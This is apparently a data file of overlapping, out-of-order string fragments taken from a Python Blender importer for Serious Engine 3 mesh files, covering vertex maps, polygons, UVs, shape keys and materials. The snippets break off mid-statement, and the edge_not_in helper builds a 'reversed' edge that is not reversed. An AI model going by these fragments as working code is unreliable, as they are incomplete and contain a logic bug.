"se3_vertices: se3_weight_pointers = se3_vertex.weight_pointers if se3_weight_pointers: for se3_weight_pointer in se3_weight_pointers: vertex_index = se3_vertex.basic_morph_pointer[1]",
"= [] num_of_indices = len(se3_vertex_indices) last_index = num_of_indices - 1 for current_index in",
"file_query.get_vertex_data_pointer(is_last_pointer) vertex_map_index = vertex_data_pointer[0] vertex_map_type = layer.vertex_maps[vertex_map_index].type if vertex_map_type == se3.VERTEX_MAP_TYPE_MORPH: morph_pointers.append(vertex_data_pointer) elif",
"(Matrix, Vector) import math filepath = operator.filepath se3_mesh = get_se3_mesh_form_file(filepath) for se3_layer in",
"#close polygon block layer.polygons.append(tuple(poly)) processed_polys += 1 file_query.follows_block_end_decl() #close polygons block num_of_poly_maps =",
"mathutils import (Matrix, Vector) import math filepath = operator.filepath se3_mesh = get_se3_mesh_form_file(filepath) for",
"for face_index, tex_data in enumerate(uv_tex.data): real_tex_face = real_faces[face_index][1][uv_index] poly = mesh.polygons[face_index] for j,",
"se3_vertex_indices[0] edges.append((se3_vertex_indices[current_index], next_index)) return edges def get_bl_fgons(vertices, ngon_face): fgon_faces = [] tessed_faces =",
"get_bl_face_uv_data(ngon_face, fgon_face)] )) face_edges = get_bl_edges(fgon_face) for face_edge in face_edges: is_fgon_edge = edge_not_in(face_edge,",
"vertices block num_of_processed_vertices = 0 while num_of_processed_vertices < num_of_verts: vertex = se3.Vertex() morph_pointers",
"material_indices.append(se3_surface_map_index) real_faces.append(tuple( [fgon_face, get_bl_face_uv_data(ngon_face, fgon_face)] )) face_edges = get_bl_edges(fgon_face) for face_edge in face_edges:",
"mesh def get_bl_face(se3_layer, se3_vertex_indices): new_indices = [] num_of_texcoord_maps = len(se3_layer.texcoord_maps) uvs_data = []",
"num_of_verts: vertex = se3.Vertex() morph_pointers = vertex.morph_pointers weight_pointers = vertex.weight_pointers uv_pointers = vertex.uv_pointers",
"maps block num_of_verts = file_query.get_long_value(\"VERTICES\") file_query.follows_block_begin_decl() #open vertices block num_of_processed_vertices = 0 while",
"block processed_poly_maps += 1 layer.polygon_maps.append(poly_map) layer.surface_maps.append(poly_map) file_query.follows_block_end_decl() #close polygon maps block file_query.follows_block_end_decl() #close",
"try: data = real_face[1][idx][real_index] except: data = (1,0) uv_data.append(data) return uvs_data def read_file(operator,",
"obj.select_set(True) se3_non_basic_morph_map = se3_layer.non_basic_morph_maps se3_vertices = se3_layer.vertices if se3_non_basic_morph_map: obj.shape_key_add(\"position\") shape_keys = []",
"if map_type == se3.VERTEX_MAP_TYPE_MORPH: type_index = num_of_morph_maps get_map_elem = file_query.get_morph_elem map_is_relative = file_query.get_bool_value(\"RELATIVE\")",
". import se3 def get_se3_mesh_form_file(filepath): file_query = se3.ASCIIFileQuery(filepath) version = file_query.get_num_value(\"SE_MESH\") mesh =",
"bl_face: real_index = real_face[0].index(vert_index) for idx, uv_data in enumerate(uvs_data): try: data = real_face[1][idx][real_index]",
"type_idx = se3_layer.vertex_maps[other_mp[0]].type_index se3_disp = se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]] se3_vert = se3_vertex.basic_morph_pointer[1] vert_data = se3_layer.vertex_maps[se3_vertex.basic_morph_pointer[0]].elements[se3_vertex.basic_morph_pointer[1]] shape_keys[type_idx",
"se3_layer.vertex_maps[se3_vertex_map_index].type_index vertex_groups[vertex_group_index].add([vertex_index], se3_vertex_weight, 'REPLACE') if se3_layer.surface_maps: materials = [] for se3_surface_map in se3_layer.surface_maps:",
"file_query.follows_block_end_decl() #close element block processed_elems += 1 file_query.follows_block_end_decl() #close elements block processed_maps +=",
"uvs_data = [] for i in range(num_of_texcoord_maps): uvs_data.append([]) se3_texcoord_maps = se3_layer.texcoord_maps for index",
"= se3.PolygonMap(map_type, map_name, map_smoothing_angle) processed_poly_idxs = 0 while processed_poly_idxs < polygon_count: poly_map.polygons.append(file_query.get_poly_idx()) processed_poly_idxs",
"materials.append(material) bpy.ops.object.material_slot_add() obj.material_slots[-1].material = material for face in mesh.polygons: face.material_index = material_indices[face.index] obj.matrix_world",
"(-elem[1]) + 1]) ) return tuple([tuple(new_indices), uvs_data]) def get_bl_edges(se3_vertex_indices): edges = [] num_of_indices",
"processed_poly_idxs = 0 while processed_poly_idxs < polygon_count: poly_map.polygons.append(file_query.get_poly_idx()) processed_poly_idxs += 1 file_query.follows_block_end_decl() #close",
"face_edges = get_bl_edges(face[0]) for face_edge in face_edges: \"\"\" if edge_not_in(face_edge, edges): edges.append(face_edge) edge_index_count",
"#open polygon maps block processed_poly_maps = 0 while processed_poly_maps < num_of_poly_maps: map_type =",
"real_faces.append(tuple( [fgon_face, get_bl_face_uv_data(ngon_face, fgon_face)] )) face_edges = get_bl_edges(fgon_face) for face_edge in face_edges: is_fgon_edge",
"fgon_edge_index in fgon_edge_indices: mesh.edges[fgon_edge_index].is_fgon = True for uv_index, se3_texcoord_map in enumerate(se3_layer.texcoord_maps): uv_tex =",
"block num_of_poly_maps = file_query.get_long_value(\"POLYGON_MAPS\") file_query.follows_block_begin_decl() #open polygon maps block processed_poly_maps = 0 while",
"se3_vertex.weight_pointers if se3_weight_pointers: for se3_weight_pointer in se3_weight_pointers: vertex_index = se3_vertex.basic_morph_pointer[1] se3_vertex_map_index = se3_weight_pointer[0]",
"0.0, 0.0, 0.0), ( 0.0, 0.0, 1.0, 0.0), ( 0.0, 1.0, 0.0, 0.0),",
"material = bpy.data.materials.new(se3_surface_map.name) materials.append(material) bpy.ops.object.material_slot_add() obj.material_slots[-1].material = material for face in mesh.polygons: face.material_index",
"map_name, map_is_relative) map.type_index = type_index num_of_map_elems = file_query.get_long_value(\"ELEMENTS\") file_query.follows_block_begin_decl() # open elements block",
"bound_edges = get_bl_edges(ngon_face[0]) fgon_faces = get_bl_fgons(vertices, ngon_face[0]) for fgon_face in fgon_faces: material_indices.append(se3_surface_map_index) real_faces.append(tuple(",
"face_edges: is_fgon_edge = edge_not_in(face_edge, bound_edges) edges.append(face_edge) if is_fgon_edge: fgon_edge_indices.append(edge_index_count) edge_index_count += 1 faces",
"file_query.get_long_value(\"POLYGON_MAPS\") file_query.follows_block_begin_decl() #open polygon maps block processed_poly_maps = 0 while processed_poly_maps < num_of_poly_maps:",
"< num_of_map_elems: file_query.follows_block_begin_decl() #open element block map.elements.append(get_map_elem()) file_query.follows_block_end_decl() #close element block processed_elems +=",
"vertex.morph_pointers weight_pointers = vertex.weight_pointers uv_pointers = vertex.uv_pointers file_query.follows_block_begin_decl() #open vertex block num_of_pointers =",
"= real_face[0].index(vert_index) for idx, uv_data in enumerate(uvs_data): try: data = real_face[1][idx][real_index] except: data",
"= [0] * len(se3_layer.polygons) material_indices = [] for se3_surface_map_index, se3_surface_map in enumerate(se3_layer.surface_maps): for",
"get_bl_face(se3_layer, se3_polygon) real_faces.append(face) face_edges = get_bl_edges(face[0]) for face_edge in face_edges: \"\"\" if edge_not_in(face_edge,",
"face_edge in face_edges: \"\"\" if edge_not_in(face_edge, edges): edges.append(face_edge) edge_index_count += 1 \"\"\" edges.append(face_edge)",
"polygon_index in se3_surface_map.polygons: se3_surface_map_indices[polygon_index] = se3_surface_map_index edge_index_count = 0 for se3_polygon_index, se3_polygon in",
"# open elements block processed_elems = 0 while processed_elems < num_of_map_elems: file_query.follows_block_begin_decl() #open",
"processed_layers < num_of_layers: layer_name = file_query.get_str_value(\"LAYER_NAME\") layer_index = file_query.get_long_value(\"LAYER_INDEX\") file_query.follows_block_begin_decl() #open layer block",
"fgon_face)] )) face_edges = get_bl_edges(fgon_face) for face_edge in face_edges: is_fgon_edge = edge_not_in(face_edge, bound_edges)",
"uv_tex = mesh.uv_layers.new(se3_texcoord_map.name) uv_loop = mesh.uv_layers[0] for face_index, tex_data in enumerate(uv_tex.data): real_tex_face =",
"index in se3_vertex_indices: se3_vertex = se3_layer.vertices[index] new_indices.append(se3_vertex.basic_morph_pointer[1]) for uv_index, uv_pointer in enumerate(se3_vertex.uv_pointers): elem",
"while processed_elems < num_of_map_elems: file_query.follows_block_begin_decl() #open element block map.elements.append(get_map_elem()) file_query.follows_block_end_decl() #close element block",
"4 se3_surface_map_index = se3_surface_map_indices[se3_polygon_index] if se3_is_tri_or_quad: material_indices.append(se3_surface_map_index) face = get_bl_face(se3_layer, se3_polygon) real_faces.append(face) face_edges",
"file_query.follows_block_end_decl() #close polygon count block processed_poly_maps += 1 layer.polygon_maps.append(poly_map) layer.surface_maps.append(poly_map) file_query.follows_block_end_decl() #close polygon",
"== se3.VERTEX_MAP_TYPE_MORPH: morph_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_WEIGHT: weight_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: uv_pointers.append(vertex_data_pointer)",
"se3_layer.texcoord_maps for index in se3_vertex_indices: se3_vertex = se3_layer.vertices[index] new_indices.append(se3_vertex.basic_morph_pointer[1]) for uv_index, uv_pointer in",
"file_query.get_num_value(\"POLYGON_MAP_SMOOTHING_ANGLE\") polygon_count = file_query.get_long_value(\"POLYGONS_COUNT\") file_query.follows_block_begin_decl() #open polygon count block poly_map = se3.PolygonMap(map_type, map_name,",
"Vector) import math filepath = operator.filepath se3_mesh = get_se3_mesh_form_file(filepath) for se3_layer in se3_mesh.layers:",
"file_query.follows_block_begin_decl() #open vertices block num_of_processed_vertices = 0 while num_of_processed_vertices < num_of_verts: vertex =",
"= [] for se3_other_mmap in se3_non_basic_morph_map: shape_keys.append(obj.shape_key_add(se3_other_mmap.name)) for se3_vertex in se3_vertices: other_morph_pnts =",
"0 num_of_morph_maps = 0 while processed_maps < num_of_maps: map_type = file_query.get_map_type() map_name =",
"in tessed_faces: fgon_face = [] for tessed_index in tessed_face: fgon_face.append(ngon_face[tessed_index]) fgon_faces.append(tuple(fgon_face)) return fgon_faces",
"last_index = num_of_indices - 1 for current_index in range(num_of_indices): next_index = se3_vertex_indices[current_index +",
"uv_loop.data[k].uv = real_tex_face[j] tranf_mat = Matrix(((-1.0, 0.0, 0.0, 0.0), ( 0.0, 0.0, 1.0,",
"se3_num_of_vertex_indices <= 4 se3_surface_map_index = se3_surface_map_indices[se3_polygon_index] if se3_is_tri_or_quad: material_indices.append(se3_surface_map_index) face = get_bl_face(se3_layer, se3_polygon)",
"polygon block num_of_values = file_query.get_num_of_values() processed_values = 0 is_last_value = False last_value_idx =",
"bound_edges) edges.append(face_edge) if is_fgon_edge: fgon_edge_indices.append(edge_index_count) edge_index_count += 1 faces = [real_face[0] for real_face",
"[0] * len(se3_layer.polygons) material_indices = [] for se3_surface_map_index, se3_surface_map in enumerate(se3_layer.surface_maps): for polygon_index",
"processed_elems < num_of_map_elems: file_query.follows_block_begin_decl() #open element block map.elements.append(get_map_elem()) file_query.follows_block_end_decl() #close element block processed_elems",
"1]) ) return tuple([tuple(new_indices), uvs_data]) def get_bl_edges(se3_vertex_indices): edges = [] num_of_indices = len(se3_vertex_indices)",
"se3 def get_se3_mesh_form_file(filepath): file_query = se3.ASCIIFileQuery(filepath) version = file_query.get_num_value(\"SE_MESH\") mesh = se3.Mesh(version) num_of_layers",
"polygon_count = file_query.get_long_value(\"POLYGONS_COUNT\") file_query.follows_block_begin_decl() #open polygon count block poly_map = se3.PolygonMap(map_type, map_name, map_smoothing_angle)",
"<= 4 se3_surface_map_index = se3_surface_map_indices[se3_polygon_index] if se3_is_tri_or_quad: material_indices.append(se3_surface_map_index) face = get_bl_face(se3_layer, se3_polygon) real_faces.append(face)",
"= real_face[1][idx][real_index] except: data = (1,0) uv_data.append(data) return uvs_data def read_file(operator, context): from",
"True vertex_data_pointer = file_query.get_vertex_data_pointer(is_last_pointer) vertex_map_index = vertex_data_pointer[0] vertex_map_type = layer.vertex_maps[vertex_map_index].type if vertex_map_type ==",
"vertex_map_type == se3.VERTEX_MAP_TYPE_MORPH: morph_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_WEIGHT: weight_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_TEXCOORD:",
"num_of_layers: layer_name = file_query.get_str_value(\"LAYER_NAME\") layer_index = file_query.get_long_value(\"LAYER_INDEX\") file_query.follows_block_begin_decl() #open layer block layer =",
"real_faces] mesh = bpy.data.meshes.new(\"Test mesh\") mesh.from_pydata(vertices, edges, faces) for fgon_edge_index in fgon_edge_indices: mesh.edges[fgon_edge_index].is_fgon",
"uvs_data def read_file(operator, context): from mathutils import (Matrix, Vector) import math filepath =",
"processed_poly_idxs < polygon_count: poly_map.polygons.append(file_query.get_poly_idx()) processed_poly_idxs += 1 file_query.follows_block_end_decl() #close polygon count block processed_poly_maps",
"1 while processed_values < num_of_values: if processed_values == last_value_idx: is_last_value = True poly.append(file_query.get_vert_idx(is_last_value))",
"+= 1 elif map_type == se3.VERTEX_MAP_TYPE_WEIGHT: type_index = num_of_weight_maps get_map_elem = file_query.get_weight_elem num_of_weight_maps",
"True for uv_index, se3_texcoord_map in enumerate(se3_layer.texcoord_maps): uv_tex = mesh.uv_layers.new(se3_texcoord_map.name) uv_loop = mesh.uv_layers[0] for",
"face in mesh.polygons: face.material_index = material_indices[face.index] obj.matrix_world = tranf_mat bpy.ops.object.transform_apply(rotation=True) context.view_layer.update() return {'FINISHED'}",
"== se3.VERTEX_MAP_TYPE_TEXCOORD: uv_pointers.append(vertex_data_pointer) num_of_processed_pointers += 1 layer.vertices.append(vertex) file_query.follows_block_end_decl() #close vertex block num_of_processed_vertices +=",
"= [] file_query.follows_block_begin_decl() #open polygon block num_of_values = file_query.get_num_of_values() processed_values = 0 is_last_value",
"in enumerate(se3_layer.texcoord_maps): uv_tex = mesh.uv_layers.new(se3_texcoord_map.name) uv_loop = mesh.uv_layers[0] for face_index, tex_data in enumerate(uv_tex.data):",
"elif vertex_map_type == se3.VERTEX_MAP_TYPE_WEIGHT: weight_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: uv_pointers.append(vertex_data_pointer) num_of_processed_pointers += 1",
"materials = [] for se3_surface_map in se3_layer.surface_maps: material = bpy.data.materials.new(se3_surface_map.name) materials.append(material) bpy.ops.object.material_slot_add() obj.material_slots[-1].material",
"se3_is_tri_or_quad = se3_num_of_vertex_indices <= 4 se3_surface_map_index = se3_surface_map_indices[se3_polygon_index] if se3_is_tri_or_quad: material_indices.append(se3_surface_map_index) face =",
"0.0, 0.0, 1.0))) obj = bpy.data.objects.new(se3_layer.name, mesh) context.collection.objects.link(obj) context.view_layer.objects.active = obj obj.select_set(True) se3_non_basic_morph_map",
"file_query.follows_block_begin_decl() #open layers block processed_layers = 0 while processed_layers < num_of_layers: layer_name =",
"+= 1 file_query.follows_block_end_decl() #close polygon count block processed_poly_maps += 1 layer.polygon_maps.append(poly_map) layer.surface_maps.append(poly_map) file_query.follows_block_end_decl()",
"len(real_face[1]) uvs_data = [] for i in range(num_of_uv_tex): uvs_data.append([]) for vert_index in bl_face:",
"= True vertex_data_pointer = file_query.get_vertex_data_pointer(is_last_pointer) vertex_map_index = vertex_data_pointer[0] vertex_map_type = layer.vertex_maps[vertex_map_index].type if vertex_map_type",
"real_face in real_faces] mesh = bpy.data.meshes.new(\"Test mesh\") mesh.from_pydata(vertices, edges, faces) for fgon_edge_index in",
"polygon count block poly_map = se3.PolygonMap(map_type, map_name, map_smoothing_angle) processed_poly_idxs = 0 while processed_poly_idxs",
"1 layer.vertices.append(vertex) file_query.follows_block_end_decl() #close vertex block num_of_processed_vertices += 1 file_query.follows_block_end_decl() #close vertices block",
"layer.vertex_maps[vertex_map_index].type if vertex_map_type == se3.VERTEX_MAP_TYPE_MORPH: morph_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_WEIGHT: weight_pointers.append(vertex_data_pointer) elif vertex_map_type",
"file_query.get_texcoord_elem num_of_texcoord_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_WEIGHT: type_index = num_of_weight_maps get_map_elem =",
"se3_num_of_vertex_indices = len(se3_polygon) se3_is_tri_or_quad = se3_num_of_vertex_indices <= 4 se3_surface_map_index = se3_surface_map_indices[se3_polygon_index] if se3_is_tri_or_quad:",
"file_query.follows_block_begin_decl() # open elements block processed_elems = 0 while processed_elems < num_of_map_elems: file_query.follows_block_begin_decl()",
"= 0 while processed_polys < num_of_polys: poly = [] file_query.follows_block_begin_decl() #open polygon block",
"get_bl_face_uv_data(real_face, bl_face): num_of_uv_tex = len(real_face[1]) uvs_data = [] for i in range(num_of_uv_tex): uvs_data.append([])",
"file_query.follows_block_end_decl() #close vertex map block file_query.follows_block_end_decl() #close vertex maps block num_of_verts = file_query.get_long_value(\"VERTICES\")",
"1 else: ngon_face = get_bl_face(se3_layer, se3_polygon) bound_edges = get_bl_edges(ngon_face[0]) fgon_faces = get_bl_fgons(vertices, ngon_face[0])",
"= [] for i in range(num_of_texcoord_maps): uvs_data.append([]) se3_texcoord_maps = se3_layer.texcoord_maps for index in",
"layer_index = file_query.get_long_value(\"LAYER_INDEX\") file_query.follows_block_begin_decl() #open layer block layer = se3.Layer(layer_name, layer_index) mesh.layers.append(layer) num_of_maps",
"fgon_faces def edge_not_in(which_edge, edges): for edge in edges: edge_rev = (edge[0], edge[1]) if",
"num_of_polys: poly = [] file_query.follows_block_begin_decl() #open polygon block num_of_values = file_query.get_num_of_values() processed_values =",
"[fgon_face, get_bl_face_uv_data(ngon_face, fgon_face)] )) face_edges = get_bl_edges(fgon_face) for face_edge in face_edges: is_fgon_edge =",
"processed_elems += 1 file_query.follows_block_end_decl() #close elements block processed_maps += 1 layer.vertex_maps_append(map) file_query.follows_block_end_decl() #close",
"+= 1 layer.vertex_maps_append(map) file_query.follows_block_end_decl() #close vertex map block file_query.follows_block_end_decl() #close vertex maps block",
"if se3_weight_maps: vertex_groups = [] for se3_weight_map in se3_weight_maps: vertex_groups.append(obj.vertex_groups.new(se3_weight_map.name)) for se3_vertex in",
"se3_non_basic_morph_map = se3_layer.non_basic_morph_maps se3_vertices = se3_layer.vertices if se3_non_basic_morph_map: obj.shape_key_add(\"position\") shape_keys = [] for",
"se3_surface_map_indices[polygon_index] = se3_surface_map_index edge_index_count = 0 for se3_polygon_index, se3_polygon in enumerate(se3_layer.polygons): se3_num_of_vertex_indices =",
"version = file_query.get_num_value(\"SE_MESH\") mesh = se3.Mesh(version) num_of_layers = file_query.get_num_value(\"LAYERS\") file_query.follows_block_begin_decl() #open layers block",
"+= 1 else: ngon_face = get_bl_face(se3_layer, se3_polygon) bound_edges = get_bl_edges(ngon_face[0]) fgon_faces = get_bl_fgons(vertices,",
"poly = mesh.polygons[face_index] for j, k in enumerate(poly.loop_indices): uv_loop.data[k].uv = real_tex_face[j] tranf_mat =",
"processed_values += 1 file_query.follows_block_end_decl() #close polygon block layer.polygons.append(tuple(poly)) processed_polys += 1 file_query.follows_block_end_decl() #close",
"0 while processed_layers < num_of_layers: layer_name = file_query.get_str_value(\"LAYER_NAME\") layer_index = file_query.get_long_value(\"LAYER_INDEX\") file_query.follows_block_begin_decl() #open",
"< polygon_count: poly_map.polygons.append(file_query.get_poly_idx()) processed_poly_idxs += 1 file_query.follows_block_end_decl() #close polygon count block processed_poly_maps +=",
"= get_bl_face(se3_layer, se3_polygon) real_faces.append(face) face_edges = get_bl_edges(face[0]) for face_edge in face_edges: \"\"\" if",
"processed_polys += 1 file_query.follows_block_end_decl() #close polygons block num_of_poly_maps = file_query.get_long_value(\"POLYGON_MAPS\") file_query.follows_block_begin_decl() #open polygon",
"in se3_layer.surface_maps: material = bpy.data.materials.new(se3_surface_map.name) materials.append(material) bpy.ops.object.material_slot_add() obj.material_slots[-1].material = material for face in",
"in se3_vertices: se3_weight_pointers = se3_vertex.weight_pointers if se3_weight_pointers: for se3_weight_pointer in se3_weight_pointers: vertex_index =",
"se3.VertexMap(map_type, map_name, map_is_relative) map.type_index = type_index num_of_map_elems = file_query.get_long_value(\"ELEMENTS\") file_query.follows_block_begin_decl() # open elements",
"se3_weight_pointers: for se3_weight_pointer in se3_weight_pointers: vertex_index = se3_vertex.basic_morph_pointer[1] se3_vertex_map_index = se3_weight_pointer[0] se3_vertex_weight =",
"real_faces.append(face) face_edges = get_bl_edges(face[0]) for face_edge in face_edges: \"\"\" if edge_not_in(face_edge, edges): edges.append(face_edge)",
"0.0, 0.0, 0.0, 1.0))) obj = bpy.data.objects.new(se3_layer.name, mesh) context.collection.objects.link(obj) context.view_layer.objects.active = obj obj.select_set(True)",
"vertex_groups[vertex_group_index].add([vertex_index], se3_vertex_weight, 'REPLACE') if se3_layer.surface_maps: materials = [] for se3_surface_map in se3_layer.surface_maps: material",
"for real_face in real_faces] mesh = bpy.data.meshes.new(\"Test mesh\") mesh.from_pydata(vertices, edges, faces) for fgon_edge_index",
"edges: edge_rev = (edge[0], edge[1]) if which_edge == edge or which_edge == edge_rev:",
"vertices = se3_layer.vertex_maps[0].elements edges = [] real_faces = [] se3_surface_map_indices = [0] *",
"= num_of_morph_maps get_map_elem = file_query.get_morph_elem map_is_relative = file_query.get_bool_value(\"RELATIVE\") num_of_morph_maps += 1 elif map_type",
"i in range(num_of_texcoord_maps): uvs_data.append([]) se3_texcoord_maps = se3_layer.texcoord_maps for index in se3_vertex_indices: se3_vertex =",
"False last_value_idx = num_of_values - 1 while processed_values < num_of_values: if processed_values ==",
"= vertex.morph_pointers weight_pointers = vertex.weight_pointers uv_pointers = vertex.uv_pointers file_query.follows_block_begin_decl() #open vertex block num_of_pointers",
"tessed_faces: fgon_face = [] for tessed_index in tessed_face: fgon_face.append(ngon_face[tessed_index]) fgon_faces.append(tuple(fgon_face)) return fgon_faces def",
"while processed_values < num_of_values: if processed_values == last_value_idx: is_last_value = True poly.append(file_query.get_vert_idx(is_last_value)) processed_values",
"vertices block num_of_polys = file_query.get_long_value(\"POLYGONS\") file_query.follows_block_begin_decl() #open polygons block processed_polys = 0 while",
"in se3_surface_map.polygons: se3_surface_map_indices[polygon_index] = se3_surface_map_index edge_index_count = 0 for se3_polygon_index, se3_polygon in enumerate(se3_layer.polygons):",
"operator.filepath se3_mesh = get_se3_mesh_form_file(filepath) for se3_layer in se3_mesh.layers: fgon_edge_indices = [] vertices =",
"vertex_groups.append(obj.vertex_groups.new(se3_weight_map.name)) for se3_vertex in se3_vertices: se3_weight_pointers = se3_vertex.weight_pointers if se3_weight_pointers: for se3_weight_pointer in",
"= len(se3_layer.texcoord_maps) uvs_data = [] for i in range(num_of_texcoord_maps): uvs_data.append([]) se3_texcoord_maps = se3_layer.texcoord_maps",
"if which_edge == edge or which_edge == edge_rev: return False return True def",
"[] se3_surface_map_indices = [0] * len(se3_layer.polygons) material_indices = [] for se3_surface_map_index, se3_surface_map in",
"#close polygon maps block file_query.follows_block_end_decl() #close layer block processed_layers += 1 file_query.follows_block_end_decl() #close",
"in range(num_of_uv_tex): uvs_data.append([]) for vert_index in bl_face: real_index = real_face[0].index(vert_index) for idx, uv_data",
"= 0 while processed_poly_maps < num_of_poly_maps: map_type = file_query.get_map_type(False) map_name = file_query.get_map_name() map_smoothing_angle",
"ngon_face) for tessed_face in tessed_faces: fgon_face = [] for tessed_index in tessed_face: fgon_face.append(ngon_face[tessed_index])",
"for vert_index in bl_face: real_index = real_face[0].index(vert_index) for idx, uv_data in enumerate(uvs_data): try:",
"1 file_query.follows_block_end_decl() #close polygon count block processed_poly_maps += 1 layer.polygon_maps.append(poly_map) layer.surface_maps.append(poly_map) file_query.follows_block_end_decl() #close",
"for fgon_edge_index in fgon_edge_indices: mesh.edges[fgon_edge_index].is_fgon = True for uv_index, se3_texcoord_map in enumerate(se3_layer.texcoord_maps): uv_tex",
"file_query.get_bool_value(\"RELATIVE\") num_of_morph_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: type_index = num_of_texcoord_maps get_map_elem =",
"'REPLACE') if se3_layer.surface_maps: materials = [] for se3_surface_map in se3_layer.surface_maps: material = bpy.data.materials.new(se3_surface_map.name)",
"= [] for se3_weight_map in se3_weight_maps: vertex_groups.append(obj.vertex_groups.new(se3_weight_map.name)) for se3_vertex in se3_vertices: se3_weight_pointers =",
"#open polygon count block poly_map = se3.PolygonMap(map_type, map_name, map_smoothing_angle) processed_poly_idxs = 0 while",
"edge_not_in(face_edge, bound_edges) edges.append(face_edge) if is_fgon_edge: fgon_edge_indices.append(edge_index_count) edge_index_count += 1 faces = [real_face[0] for",
"data = real_face[1][idx][real_index] except: data = (1,0) uv_data.append(data) return uvs_data def read_file(operator, context):",
"uv_data.append(data) return uvs_data def read_file(operator, context): from mathutils import (Matrix, Vector) import math",
"= se3_layer.non_basic_morph_maps se3_vertices = se3_layer.vertices if se3_non_basic_morph_map: obj.shape_key_add(\"position\") shape_keys = [] for se3_other_mmap",
"= True for uv_index, se3_texcoord_map in enumerate(se3_layer.texcoord_maps): uv_tex = mesh.uv_layers.new(se3_texcoord_map.name) uv_loop = mesh.uv_layers[0]",
"file_query.follows_block_begin_decl() #open vertex maps block processed_maps = 0 num_of_texcoord_maps = 0 num_of_weight_maps =",
"current_index != last_index else se3_vertex_indices[0] edges.append((se3_vertex_indices[current_index], next_index)) return edges def get_bl_fgons(vertices, ngon_face): fgon_faces",
"se3_vertex_weight = se3_layer.vertex_maps[se3_vertex_map_index].elements[se3_weight_pointer[1]] vertex_group_index = se3_layer.vertex_maps[se3_vertex_map_index].type_index vertex_groups[vertex_group_index].add([vertex_index], se3_vertex_weight, 'REPLACE') if se3_layer.surface_maps: materials =",
"= file_query.get_bool_value(\"RELATIVE\") num_of_morph_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: type_index = num_of_texcoord_maps get_map_elem",
"get_map_elem = file_query.get_weight_elem num_of_weight_maps += 1 map = se3.VertexMap(map_type, map_name, map_is_relative) map.type_index =",
"se3_texcoord_maps[uv_index].elements[uv_pointer[1]] uvs_data[uv_index].append(tuple([elem[0], (-elem[1]) + 1]) ) return tuple([tuple(new_indices), uvs_data]) def get_bl_edges(se3_vertex_indices): edges =",
"next_index)) return edges def get_bl_fgons(vertices, ngon_face): fgon_faces = [] tessed_faces = ngon_tesselate(vertices, ngon_face)",
"= se3.VertexMap(map_type, map_name, map_is_relative) map.type_index = type_index num_of_map_elems = file_query.get_long_value(\"ELEMENTS\") file_query.follows_block_begin_decl() # open",
"return False return True def get_bl_face_uv_data(real_face, bl_face): num_of_uv_tex = len(real_face[1]) uvs_data = []",
"+= 1 elif map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: type_index = num_of_texcoord_maps get_map_elem = file_query.get_texcoord_elem num_of_texcoord_maps",
"new_indices = [] num_of_texcoord_maps = len(se3_layer.texcoord_maps) uvs_data = [] for i in range(num_of_texcoord_maps):",
"file_query.get_map_type() map_name = file_query.get_map_name() file_query.follows_block_begin_decl() #open vertex map block if map_type == se3.VERTEX_MAP_TYPE_MORPH:",
"face_edges = get_bl_edges(fgon_face) for face_edge in face_edges: is_fgon_edge = edge_not_in(face_edge, bound_edges) edges.append(face_edge) if",
"in enumerate(uv_tex.data): real_tex_face = real_faces[face_index][1][uv_index] poly = mesh.polygons[face_index] for j, k in enumerate(poly.loop_indices):",
"num_of_processed_pointers += 1 layer.vertices.append(vertex) file_query.follows_block_end_decl() #close vertex block num_of_processed_vertices += 1 file_query.follows_block_end_decl() #close",
"< num_of_maps: map_type = file_query.get_map_type() map_name = file_query.get_map_name() file_query.follows_block_begin_decl() #open vertex map block",
"map_name = file_query.get_map_name() file_query.follows_block_begin_decl() #open vertex map block if map_type == se3.VERTEX_MAP_TYPE_MORPH: type_index",
"element block processed_elems += 1 file_query.follows_block_end_decl() #close elements block processed_maps += 1 layer.vertex_maps_append(map)",
"= se3.Layer(layer_name, layer_index) mesh.layers.append(layer) num_of_maps = file_query.get_long_value(\"VERTEX_MAPS\") file_query.follows_block_begin_decl() #open vertex maps block processed_maps",
"+ Vector(se3_disp) se3_weight_maps = se3_layer.weight_maps if se3_weight_maps: vertex_groups = [] for se3_weight_map in",
"if is_fgon_edge: fgon_edge_indices.append(edge_index_count) edge_index_count += 1 faces = [real_face[0] for real_face in real_faces]",
"se3_vertex_indices: se3_vertex = se3_layer.vertices[index] new_indices.append(se3_vertex.basic_morph_pointer[1]) for uv_index, uv_pointer in enumerate(se3_vertex.uv_pointers): elem = se3_texcoord_maps[uv_index].elements[uv_pointer[1]]",
"tex_data in enumerate(uv_tex.data): real_tex_face = real_faces[face_index][1][uv_index] poly = mesh.polygons[face_index] for j, k in",
"= real_faces[face_index][1][uv_index] poly = mesh.polygons[face_index] for j, k in enumerate(poly.loop_indices): uv_loop.data[k].uv = real_tex_face[j]",
"while processed_polys < num_of_polys: poly = [] file_query.follows_block_begin_decl() #open polygon block num_of_values =",
"obj = bpy.data.objects.new(se3_layer.name, mesh) context.collection.objects.link(obj) context.view_layer.objects.active = obj obj.select_set(True) se3_non_basic_morph_map = se3_layer.non_basic_morph_maps se3_vertices",
"block num_of_processed_vertices = 0 while num_of_processed_vertices < num_of_verts: vertex = se3.Vertex() morph_pointers =",
"if num_of_processed_pointers == last_pointer_index: is_last_pointer = True vertex_data_pointer = file_query.get_vertex_data_pointer(is_last_pointer) vertex_map_index = vertex_data_pointer[0]",
"block num_of_polys = file_query.get_long_value(\"POLYGONS\") file_query.follows_block_begin_decl() #open polygons block processed_polys = 0 while processed_polys",
"file_query.get_long_value(\"LAYER_INDEX\") file_query.follows_block_begin_decl() #open layer block layer = se3.Layer(layer_name, layer_index) mesh.layers.append(layer) num_of_maps = file_query.get_long_value(\"VERTEX_MAPS\")",
